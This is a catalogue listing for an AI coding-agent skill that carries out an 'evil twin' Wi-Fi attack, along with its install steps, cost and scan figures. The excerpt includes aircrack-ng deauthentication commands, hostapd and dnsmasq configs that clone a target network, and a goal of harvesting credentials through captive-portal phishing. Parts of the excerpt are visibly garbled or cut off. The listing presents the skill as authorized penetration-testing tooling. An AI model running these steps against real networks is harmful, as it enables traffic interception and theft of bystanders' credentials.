rogue-access-point-evil-twin

rogue-access-point-evil-twin is a skill for Claude Code from akashrpatil/awesome-offensive-security-skills. It costs 78 tokens per session (1,277 once invoked), scanned A, original, Apache-2.0.

A wireless security-testing procedure for creating an imitation of a legitimate Wi-Fi network, known as an evil twin. It checks whether nearby users or devices connect to the imitation and whether a fake sign-in page can capture test credentials.

In plain words
What is it for?
Testing employee security awareness, assessing rogue access-point detection, checking guest-network isolation, and validating captive-portal phishing defenses.
Why use it?
It helps measure the risk of users trusting an unverified network and reveals weaknesses in wireless awareness or network isolation. Use requires physical proximity and explicit authorization.

Skill for Claude Code

Written for Claude Code: shipped in a Claude Code plugin.

Needs its repository: it reads a path above its own folder, which exists only inside the repository. The line is > - [`_shared/references/elite-chaining-strategy.md`](../_shared/references/elite-chaining-strategy.md) — Exploit chaining methodology and high-payout chain pat.

Part of the cyberskills-elite plugin — 191 skills shipped together

Good fit Testing employee security awareness, assessing rogue access-point detection, checking guest-network isolation, and validating captive-portal phishing defenses.

Compare 6 skills from other repositories ↓
Install

Getting it into your agent

It runs from inside its repository, so the clone comes first — what it calls does not travel with the file alone.

Clone the repo
git clone --depth 1 https://github.com/akashrpatil/awesome-offensive-security-skills
agentmods
npx agentmods add skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin

Made for: Claude Code.

Or install cyberskills-elite, the plugin that ships this one along with the rest of its 191 skills.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for rogue-access-point-evil-twin

README.md
[![agentmods](https://agentmods.dev/badge/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin/github.svg)](https://agentmods.dev/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin)
Your own site
<a href="https://agentmods.dev/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin"><img src="https://agentmods.dev/badge/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin/github.svg" alt="Measured on agentmods" height="20"></a>

Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.

agentmods 80×15 button for rogue-access-point-evil-twin

Your own site · 80×15
<a href="https://agentmods.dev/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin"><img src="https://agentmods.dev/badge/skills/akashrpatil/awesome-offensive-security-skills/rogue-access-point-evil-twin.svg" alt="Reviewed on agentmods" width="80" height="20"></a>
Per session 78 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 1,277 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 0 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00078 $0.01277
Opus 5 $0.00039 $0.00639
Sonnet 5 $0.00016 $0.00255
Haiku 4.5 $0.00008 $0.00128

Measured 8d ago against content hash 44d3d5947a2d, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-12, from the pricing page.

Security

Grade A, and why

rogue-access-point-evil-twin scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 8d ago.

The scan reads SKILL.md. This mod also ships 1 executable file (scripts/process.py), listed below but not scanned — reading those needs a real analyzer, not pattern matching.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Nothing flagged

None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.

skills/penetration-testing/wireless/rogue-access-point-evil-twin/SKILL.md · 145 lines

How it starts

The opening of the file, as written. The whole thing — 145 lines — stays where its author put it; the contents beside it link to each section on GitHub.

Rogue Access Point (Evil Twin)

When to Use

  • When conducting physical Red Team operations or precise Wireless Penetration Tests to validate if corporate employees will connect to untrusted networks (e.g., verifying Guest network isolation or testing Security Awareness).
  • To aggressively intercept wireless network traffic when standard passive sniffing (monitor mode) yields only encrypted WPA2/WPA3 packets, which require offline cracking.
  • To harvest corporate credentials directly from users via sophisticated Captive Portal phishing campaigns mimicking the target organization's authentic login page.

Prerequisites

  • Wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036ACH)
  • Kali Linux or similar distribution with aircrack-ng suite installed
  • Physical proximity to the target wireless network
  • Authorization to test the target wireless infrastructure

Workflow

Phase 1: Reconnaissance (The Setup)

# Concept: To clone a network 1. Start Interface airmon-ng start wlan1

# 2. Sniff airodump-ng wlan1mon

# Target BSSID: 00:11:22:33:44:55
# Target SSID: "Corporate_Private"
# Target Channel: 6

Phase 2: Building the Evil Twin

# Concept: We must 1. Configure Hostapd # cat <<EOF > hostapd.conf
interface=wlan1mon
ssid=Corporate_Private
bssid=00:11:22:33:44:55
hw_mode=g
channel=6
EOF

# 2. Configure # cat <<EOF > dnsmasq.conf
interface=wlan1mon
dhcp-range=192.168.1.10,192.168.1.100,8h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
EOF

# 3. Start hostapd hostapd.conf &
dnsmasq -C dnsmasq.conf -d &

Phase 3: The Forced Migration (Deauthentication)

# Send aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c [VICTIM_MAC] wlan2mon

Phase 4: Exploitation (Captive Portal / MitM)

# ```

#### Decision Point 🔀
```mermaid
flowchart TD
    A[Setup ] --> B[Host ]
    B --> C{Does ]}
    C -->|Yes| D[Capture ]
    C -->|No| E[Increase ]
    D --> F[Maintain ]

🔵 Blue Team Detection & Defense

  • Wireless Intrusion Prevention System (WIPS): 802.1X / Enterprise Security: Client-Side Awareness: Key Concepts | Concept | Description | |---------|-------------|

Output Format

Rogue Access Point Evil Twin — Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]

Read the full file on GitHub · 145 lines

Files

What ships with it

2 files beside SKILL.md in the same directory: the scripts, references and assets a skill reads on demand. Not counted in the per-session cost; read them before you install if any of them is executable.

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 8d ago First seen · 145 lines · 78 tokens per session scan A 44d3d5947a2d

Subscribe to this mod's changes

rogue-access-point-evil-twin is a skill published in the GitHub repository akashrpatil/awesome-offensive-security-skills (5 stars, last pushed 4mo ago), licensed Apache-2.0. It adds 78 tokens to every session and 1,277 once invoked, about $0.0004 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-09-03.